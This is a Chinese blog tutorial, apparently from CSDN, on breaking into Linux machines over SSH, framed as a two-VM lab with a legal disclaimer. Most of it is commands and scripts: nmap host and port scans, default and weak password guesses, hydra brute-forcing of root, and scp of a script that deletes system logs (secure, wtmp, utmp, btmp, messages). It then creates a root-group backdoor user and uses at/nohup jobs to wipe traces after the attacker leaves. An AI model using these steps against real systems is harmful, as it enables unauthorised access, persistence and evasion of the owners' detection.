【Linux系统入侵】——SSH远程登录

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

入侵流程

准备好清除痕迹的shell脚本👉扫描在线的IP👉扫描IP22端口👉尝试连接👉传输shell脚本👉正式入侵👉执行shell脚本👉完成你想要的操作👉华丽退出✌欧耶

啥也不知道的
扫描IP
暴力破解
知道用户名密码直接连
成功入侵

点我一键到底

在这里插入图片描述

实验准备:

  • 虚拟机
  • 两台linux系统(一台做入侵机一台做受害机)
  • 两台机子都用NAT模式连接局域网
  • 创建shell脚本,用于清除你的入侵痕迹
  • 弱口令密码字典

点开虚拟机的设置(也可以Ctrl+D)然后找到网络适配器,选择NAT模式在这里插入图片描述在这里插入图片描述
/var/www/目录下创建shell脚本,命令:vi /var/www/shell.sh

普通脚本内容:

#!/bin/bash
rm /var/log/secure
echo y
rm /var/log/wtmp
echo y
rm /var/log/utmp
echo y
rm /var/log/btmp
echo y
rm /var/log/messages
echo y
rm /var/spool/mail/root
echo y
rm -- "$0"

自动化脚本内容:
注意这里的IP换成你自己的

#!/bin/bash
readonly your_ip="192.168.70.146"
if [ $(w | grep -c $your_ip) -gt 0 ];
	then
	sleep 5m
	cd /var/www/ && ./shell.sh
else
	rm /var/log/secure
	echo y
	rm /var/log/wtmp
	echo y
	rm /var/log/utmp
	echo y
	rm /var/log/btmp
	echo y
	rm /var/log/messages
	echo y
	rm /var/spool/mail/root
	echo y
	rm -- "$0"
fi

然后添加执行权限

chmod +x /var/www/shell.sh

在这里插入图片描述

入侵开始:扫描IP阶段

1、首先查看本机IP在什么网段,如图在192.168.70.0网段

在这里插入图片描述

2、然后使用namp扫描此网段存在的主机,如:namp -sP 192.168.70.0/24发现了两个目标

在这里插入图片描述

3、用namp -p22 192.168.70.xxx命令扫描目标机的22端口,如果ssh端口开启便可以尝试连接了

在这里插入图片描述
在这里插入图片描述

入侵情况一:你知道对方使用的用户名,并且能猜到密码

现在就要把脚本准备好,入侵成功后第一时间把脚本放进去,否则对方一旦关机下线,你就什么也做不了了,会留下入侵痕迹,很危险

1、使用ssh a@192.168.70.141命令连接开启ssh的IP,注意这里输入的密码是没有显示的,你输完敲回车就行了

我试验的用户名是a,试了密码123456但是没进去,它让再输一次,我输入456789就成功了,进去之后会有个中括号把用户名括起来。

注意:此时你一定要确认用户名正确,大小写都不能错,因为就算没有这个用户也会提示你输入密码,然后你就会不断地尝试进入根本不存在的用户,最后自闭了,这个时候你可千万别找我,我好心提醒过你了

第一次连接会问你是否继续,输入yes回车就可以了,密码最多尝试三次,断开之后重新连就行了
在这里插入图片描述

2、你可以输入wwhowhoami确定一下成功没,在用户名后面会显示出你的IP,如图:

在这里插入图片描述

3、你也可以ifconfig查看一下IP变化

在这里插入图片描述

4、这是受害者的那台电脑,就算他开着终端也不会有任何变化,完全不知道你进来了

在这里插入图片描述

警告:进去之后千万别乱动:1.可能引起受害者的注意,人家一查当前登录用户就能知道你的IP。2.你是最高权限,搞坏系统,删除数据无所不能。所以为了自己的后半生随便看看得了。
在这里插入图片描述

入侵情况二:你不知道对方使用的用户名

方法1:使用ssh 192.168.70.141命令连接开启ssh的IP

此时默认登录的root用户,默认密码是123456,一旦你登进去就是最高权限了,想干嘛干嘛

第一次登录会问你确定连接么,输入yes回车就可以了
在这里插入图片描述

方法2:使用暴力破解工具

使用kali自带的hydra进行暴力破解,首先创建一个密码字典,内容可以自己写,也可以复制一下其他地方的弱口令密码然后就可以执行下列命令了

hydra -l root -P pwd.dic -t 1 -vV -e ns 192.168.70.141 ssh

可以看到正确密码很明显的显示出来了,但是现在别急着连接
在这里插入图片描述
在这里插入图片描述

密码爆破成功后

1、把事先准备好的shell脚本传过去,这是在没有连接的情况下,命令如下:

scp /var/www/shell.sh root@192.168.70.141:/var/www/

这样的显示基本上就成功了
在这里插入图片描述
在确认一下,可以看到已经传过来了
在这里插入图片描述

2、脚本传过去之后就可以连接了

连接上之后你最好再确认一下,然后你就可以想干嘛干嘛了
在这里插入图片描述
比如看看他的密码文件
在这里插入图片描述
或者创建个root权限的用户,方便下次入侵useradd superman -g root -p 123.com
再或者输出一句话给他个惊喜
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

痕迹消除

使用普通脚本

有时可能你还没来得及退出对方就关机了,这时你的终端就不能动了,所以最好一连接上对方服务器你就制定好计划任务来执行脚本文件,如下:

直接输入命令at now +3 minutes然后再手动输入cd /var/www/ && ./shell.shCtrl+D退出即可,如下:
注意:手动输入时不能删除,要一次性输入成功,然后按Ctrl+D,如果出错就重新来一遍

[root@a ~]# at now +3 minutes	 #执行at并指定执行时刻为现在时间的后两分钟
at> cd /var/www/ && ./shell.sh   #手动输入命令并回车
at> <EOT>						 #Ctrl+D结束输入
job 1 at 2020-02-29 18:07		 #显示的任务号及执行时间
[root@a ~]# 

如果你连接上就立马定时任务的话,可以将时间定的久一点,千万不要超时退出,否则这个脚本就失效了

使用自动化脚本

使用这个脚本也是最好连接上对方你就开始执行,好处是执行完你就不必担心了,它每五分钟自动检测一次连接状态,当你退出后它检测不到你的IP就会自动执行删除计划,使用方法如下:

输入nohup ./shell.sh &将脚本隐藏在后台运行,可以输入ps -ef | grep shell.sh查看进程

在这里插入图片描述
受害方也能看到此进程
在这里插入图片描述
隐藏在后台的脚本不会影响你退出
在这里插入图片描述


👆👆☝👆👆👆至此全部教学完毕,如有疑问欢迎写信

©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值